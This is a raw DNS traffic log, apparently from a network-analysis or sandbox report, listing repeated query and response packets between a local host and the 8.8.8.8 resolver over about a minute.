                                      Aug 31, 2022 23:59:03.405114889 CEST53651968.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.423759937 CEST6519753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.440768003 CEST53651978.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.441447020 CEST6519853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.461023092 CEST53651988.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.462712049 CEST6519953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.482172012 CEST53651998.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.482703924 CEST6520053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.502460003 CEST53652008.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:03.503720045 CEST6520153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:03.521188974 CEST53652018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:05.917948008 CEST5870853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.501457930 CEST53587088.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.518330097 CEST5870953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.537347078 CEST53587098.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.541033030 CEST5871053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.560595989 CEST53587108.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.561108112 CEST5871153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.581572056 CEST53587118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.582118988 CEST5871253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.599746943 CEST53587128.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:06.600199938 CEST5871353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:06.617580891 CEST53587138.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:11.520944118 CEST5304953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.252245903 CEST53530498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.277647972 CEST5305053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.296758890 CEST53530508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.297575951 CEST5305153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.317811966 CEST53530518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.328339100 CEST5305253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.348246098 CEST53530528.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.348893881 CEST5305353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.368700981 CEST53530538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:12.369224072 CEST5305453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:12.389571905 CEST53530548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.234563112 CEST6008853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.311661005 CEST53600888.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.331684113 CEST6008953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.352329969 CEST53600898.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.353291035 CEST6009053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.371464014 CEST53600908.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.371988058 CEST6009153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.392226934 CEST53600918.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.392903090 CEST6009253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.412553072 CEST53600928.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:14.413882971 CEST6009353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:14.435400963 CEST53600938.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.707844973 CEST6356253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.756638050 CEST53635628.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.767276049 CEST6356353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.786377907 CEST53635638.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.789041996 CEST6356453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.808978081 CEST53635648.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.809427023 CEST6356553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.827245951 CEST53635658.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.838541031 CEST6356653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.856257915 CEST53635668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:15.856786013 CEST6356753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:15.874497890 CEST53635678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:17.091232061 CEST5342853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.080478907 CEST5342853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.240111113 CEST53534288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.249520063 CEST5342953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.268676043 CEST53534298.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.269253969 CEST5343053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.286752939 CEST53534308.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.287184954 CEST5343153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.304971933 CEST53534318.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.305428028 CEST5343253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.325037003 CEST53534328.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.325584888 CEST5343353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:18.345073938 CEST53534338.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:18.697067022 CEST53534288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:19.656590939 CEST6551153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.653614998 CEST6551153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.690124035 CEST53655118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.699863911 CEST6551253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.719475031 CEST53655128.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.720499992 CEST6551353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.740108013 CEST53655138.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.740564108 CEST6551453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.757486105 CEST53655118.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.760489941 CEST53655148.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.761806011 CEST6551553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.779664040 CEST53655158.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:20.780160904 CEST6551653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:20.799532890 CEST53655168.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.015532970 CEST5982053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.145498037 CEST53598208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.154289007 CEST5982153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.173274994 CEST53598218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.173866034 CEST5982253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.191287994 CEST53598228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.195880890 CEST5982353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.215575933 CEST53598238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.215950966 CEST5982453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.235313892 CEST53598248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:22.235685110 CEST5982553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:22.255491972 CEST53598258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:23.593552113 CEST6482353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.179404020 CEST53648238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.188785076 CEST5199353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.206090927 CEST53519938.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.206868887 CEST5199453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.226692915 CEST53519948.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.227190971 CEST5199553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.245124102 CEST53519958.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.245595932 CEST5199653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.265338898 CEST53519968.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:24.265731096 CEST5199753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:24.285284042 CEST53519978.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:25.542416096 CEST5811953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:26.630718946 CEST5811953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.165951967 CEST53581198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.172085047 CEST5812053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.189124107 CEST53581208.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.189977884 CEST5812153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.209870100 CEST53581218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.247838974 CEST5812253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.267399073 CEST53581228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.268862963 CEST5812353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.286777020 CEST53581238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.287358046 CEST5812453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:27.307277918 CEST53581248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:27.705112934 CEST53581198.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:28.925348043 CEST4916653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.260584116 CEST4916653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.836324930 CEST53491668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.844980955 CEST4916753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.862699986 CEST53491678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.866137028 CEST4916853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.884212971 CEST53491688.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.884764910 CEST4916953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.904670000 CEST53491698.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.905071974 CEST4917053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.922668934 CEST53491708.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:30.923072100 CEST4917153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:30.942532063 CEST53491718.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.146146059 CEST53491668.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.225573063 CEST5830153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.299428940 CEST53583018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.305984020 CEST5830253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.323093891 CEST53583028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.323930025 CEST5830353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.343451023 CEST53583038.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.344903946 CEST5830453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.364872932 CEST53583048.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.365597963 CEST5830553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.385454893 CEST53583058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:32.396919012 CEST5830653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:32.415087938 CEST53583068.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:33.635987043 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:34.632500887 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:35.644903898 CEST6344653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.530746937 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.543714046 CEST6344753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.563038111 CEST53634478.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.563648939 CEST6344853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.583677053 CEST53634488.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.584182024 CEST6344953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.602057934 CEST53634498.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.602427959 CEST6345053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.620131016 CEST53634508.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.620733023 CEST6345153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:36.640644073 CEST53634518.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:36.792453051 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:37.851984024 CEST4987453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:38.863599062 CEST4987453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.088445902 CEST53634468.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.439719915 CEST53498748.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.448174953 CEST4987553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.465456009 CEST53498758.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.465929985 CEST4987653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.483722925 CEST53498768.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.484544992 CEST4987753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.503002882 CEST53498778.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.503390074 CEST4987853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.521054029 CEST53498788.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.521467924 CEST4987953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:39.540900946 CEST53498798.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:39.567404985 CEST53498748.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.790900946 CEST6538553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.827275038 CEST53653858.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.836529016 CEST6538653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.853662968 CEST53653868.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.854235888 CEST6538753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.873889923 CEST53653878.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.874320984 CEST6538853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.891818047 CEST53653888.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.892307043 CEST6538953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.909749031 CEST53653898.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:40.910653114 CEST6539053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:40.930310965 CEST53653908.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.179858923 CEST5415353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.224383116 CEST53541538.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.235496044 CEST5415453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.254621983 CEST53541548.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.262891054 CEST5415553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.280628920 CEST53541558.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.281209946 CEST5415653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.301055908 CEST53541568.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.301537037 CEST5415753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.321456909 CEST53541578.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:42.322125912 CEST5415853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:42.341794014 CEST53541588.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:43.590250015 CEST6460253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:44.583146095 CEST6460253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.599035978 CEST6460253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.634243011 CEST53646028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.651026011 CEST6460353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.670564890 CEST53646038.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.671057940 CEST6460453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.691019058 CEST53646048.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.691448927 CEST6460553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.711270094 CEST53646058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.711695910 CEST6460653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.729429960 CEST53646068.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.737027884 CEST6460753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:45.756819010 CEST53646078.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:45.793020010 CEST53646028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:46.698057890 CEST53646028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:47.058562040 CEST5078453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.075234890 CEST5078453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.139800072 CEST53507848.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.150029898 CEST5078553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.167660952 CEST53507858.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.168544054 CEST5078653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.188586950 CEST53507868.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.189199924 CEST5078753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.209095001 CEST53507878.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.220005989 CEST5078853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.238341093 CEST53507888.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.239259958 CEST5078953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:48.259392023 CEST53507898.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:48.697335958 CEST53507848.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:49.506455898 CEST6412153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.521322966 CEST6412153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.544496059 CEST53641218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.556144953 CEST6412253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.575448990 CEST53641228.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.576560974 CEST6412353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.592947006 CEST53641218.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.596391916 CEST53641238.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.605078936 CEST6412453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.624696016 CEST53641248.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.625201941 CEST6412553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.648333073 CEST53641258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:50.649034023 CEST6412653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:50.668668032 CEST53641268.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:51.926340103 CEST6496753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:51.954930067 CEST53649678.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:51.969147921 CEST6496853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:51.988468885 CEST53649688.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:51.989362001 CEST6496953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:52.008342981 CEST53649698.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:52.023263931 CEST6497053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:52.042766094 CEST53649708.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:52.043279886 CEST6497153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:52.062791109 CEST53649718.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:52.063211918 CEST6497253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:52.083273888 CEST53649728.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.315284014 CEST6082553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:53.888886929 CEST53608258.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.910933018 CEST6082653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:53.930005074 CEST53608268.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.930680037 CEST6082753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:53.951704979 CEST53608278.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.952245951 CEST6082853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:53.972112894 CEST53608288.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.975918055 CEST6082953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:53.996426105 CEST53608298.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:53.997132063 CEST6083053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:54.017124891 CEST53608308.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:55.249011993 CEST4920153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.259572983 CEST4920153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.294773102 CEST53492018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.303123951 CEST4920253192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.322354078 CEST53492028.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.322889090 CEST4920353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.342601061 CEST53492038.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.342972994 CEST4920453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.360450983 CEST53492048.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.360950947 CEST4920553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.380527020 CEST53492058.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.381031036 CEST4920653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:56.400538921 CEST53492068.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:56.951119900 CEST53492018.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.561789036 CEST6493653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.635045052 CEST53649368.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.647419930 CEST6493753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.666646004 CEST53649378.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.667177916 CEST6493853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.687072039 CEST53649388.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.687539101 CEST6493953192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.705380917 CEST53649398.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.705862045 CEST6494053192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.725605011 CEST53649408.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:57.726016045 CEST6494153192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:57.745647907 CEST53649418.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:58.812098026 CEST6047353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.818274021 CEST6047353192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.852207899 CEST53604738.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:59.859764099 CEST6047453192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.877156019 CEST53604748.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:59.877731085 CEST6047553192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.898338079 CEST53604758.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:59.898864031 CEST6047653192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.918551922 CEST53604768.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:59.919053078 CEST6047753192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.938997030 CEST53604778.8.8.8192.168.2.3
                                      Aug 31, 2022 23:59:59.939438105 CEST6047853192.168.2.38.8.8.8
                                      Aug 31, 2022 23:59:59.959988117 CEST53604788.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:01.037652969 CEST5937453192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.037312031 CEST5937453192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.071805954 CEST53593748.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.080656052 CEST5661753192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.100327969 CEST53566178.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.100950956 CEST5661853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.120507956 CEST53566188.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.120944977 CEST5661953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.141537905 CEST53566198.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.142087936 CEST5662053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.160455942 CEST53566208.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.160962105 CEST5662153192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:02.179536104 CEST53566218.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:02.700483084 CEST53593748.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.267693043 CEST6118453192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.343596935 CEST53611848.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.353477001 CEST6118553192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.370637894 CEST53611858.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.371157885 CEST6118653192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.390731096 CEST53611868.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.391253948 CEST6118753192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.410953045 CEST53611878.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.411292076 CEST6118853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.430705070 CEST53611888.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.431119919 CEST6118953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:03.450587988 CEST53611898.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:03.829907894 CEST53604738.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:04.517784119 CEST5738753192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:05.091319084 CEST53573878.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:05.099412918 CEST5738853192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:05.118396044 CEST53573888.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:05.118977070 CEST5738953192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:05.138398886 CEST53573898.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:05.138813972 CEST5739053192.168.2.38.8.8.8
                                      Sep 1, 2022 00:00:05.158288956 CEST53573908.8.8.8192.168.2.3
                                      Sep 1, 2022 00:00:05.158775091 CEST5739153192.168.2.38.8.8.8
